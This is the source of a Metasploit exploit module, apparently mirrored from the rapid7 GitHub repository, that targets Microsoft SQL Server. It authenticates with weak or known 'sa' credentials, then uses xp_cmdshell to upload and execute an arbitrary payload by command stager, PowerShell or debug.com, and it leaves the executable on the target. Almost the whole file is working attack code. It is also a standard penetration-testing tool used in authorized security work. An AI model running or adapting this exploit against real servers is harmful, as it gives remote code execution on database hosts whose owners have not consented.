Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::MSSQL

10
  include Msf::Exploit::CmdStager

11
  include Msf::OptionalSession::MSSQL

12
  # include Msf::Exploit::CmdStagerDebugAsm

13
  # include Msf::Exploit::CmdStagerDebugWrite

14
  # include Msf::Exploit::CmdStagerTFTP

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Microsoft SQL Server Payload Execution',

21
        'Description' => %q{

22
          This module executes an arbitrary payload on a Microsoft SQL Server by using

23
          the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

24


25
          First, the original method uses Windows 'debug.com'. File size restrictions are

26
          avoided by incorporating the debug bypass method presented by SecureStat at

27
          Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.

28


29
          A second method takes advantage of the Command Stager subsystem. This allows using

30
          various techniques, such as using a TFTP server, to send the executable. By default

31
          the Command Stager uses 'wcsript.exe' to generate the executable on the target.

32


33
          Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the

34
          payload on the target.

35


36
          NOTE: This module will leave a payload executable on the target system when the

37
          attack is finished.

38
        },

39
        'Author' => [

40
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method

41
          'jduck' # command stager mods

42
        ],

43
        'License' => MSF_LICENSE,

44
        'References' => [

45
          # 'sa' password in logs

46
          [ 'CVE', '2000-0402' ],

47
          [ 'OSVDB', '557' ],

48
          [ 'BID', '1281' ],

49


50
          # blank default 'sa' password

51
          [ 'CVE', '2000-1209' ],

52
          [ 'OSVDB', '15757' ],

53
          [ 'BID', '4797' ]

54
        ],

55
        'Platform' => 'win',

56
        'Arch' => [ ARCH_X86, ARCH_X64 ],

57
        'Targets' => [

58
          [ 'Automatic', {} ],

59
        ],

60
        'CmdStagerFlavor' => 'vbs',

61
        'DefaultTarget' => 0,

62
        'DisclosureDate' => '2000-05-30',

63
        'Notes' => {

64
          'Reliability' => UNKNOWN_RELIABILITY,

65
          'Stability' => UNKNOWN_STABILITY,

66
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

67
        }

68
      )

69
    )

70
    register_options(

71
      [

72
        OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])

73
      ]

74
    )

75
  end

76


77
  def check

78
    if session

79
      set_mssql_session(session.client)

80
    end

81


82
    unless session || mssql_login_datastore

83
      vprint_status("Invalid SQL Server credentials")

84
      return Exploit::CheckCode::Detected

85
    end

86


87
    mssql_query("select @@version", true)

88
    if mssql_is_sysadmin

89
      vprint_good "User #{datastore['USERNAME']} is a sysadmin"

90
      Exploit::CheckCode::Vulnerable

91
    else

92
      Exploit::CheckCode::Safe

93
    end

94
  ensure

95
    disconnect

96
  end

97


98
  # This is method required for the CmdStager to work...

99
  def execute_command(cmd, opts)

100
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])

101
  end

102


103
  def exploit

104
    if session

105
      set_mssql_session(session.client)

106
    else

107
      unless mssql_login_datastore

108
        print_status("Invalid SQL Server credentials")

109
        return

110
      end

111
    end

112


113
    method = datastore['METHOD'].downcase

114


115
    if (method =~ /^cmd/)

116
      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']

117
      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })

118
    else

119
      # Generate the EXE, this is the same no matter what delivery mechanism we use

120
      exe = generate_payload_exe

121


122
      # Use powershell method for payload delivery if specified

123
      if (method =~ /^ps/) or (method =~ /^power/)

124
        powershell_upload_exec(exe)

125
      else

126
        # Otherwise, fall back to the old way..

127
        mssql_upload_exec(exe, datastore['VERBOSE'])

128
      end

129
    end

130


131
    handler

132
    disconnect

133
  end

134
end

135


136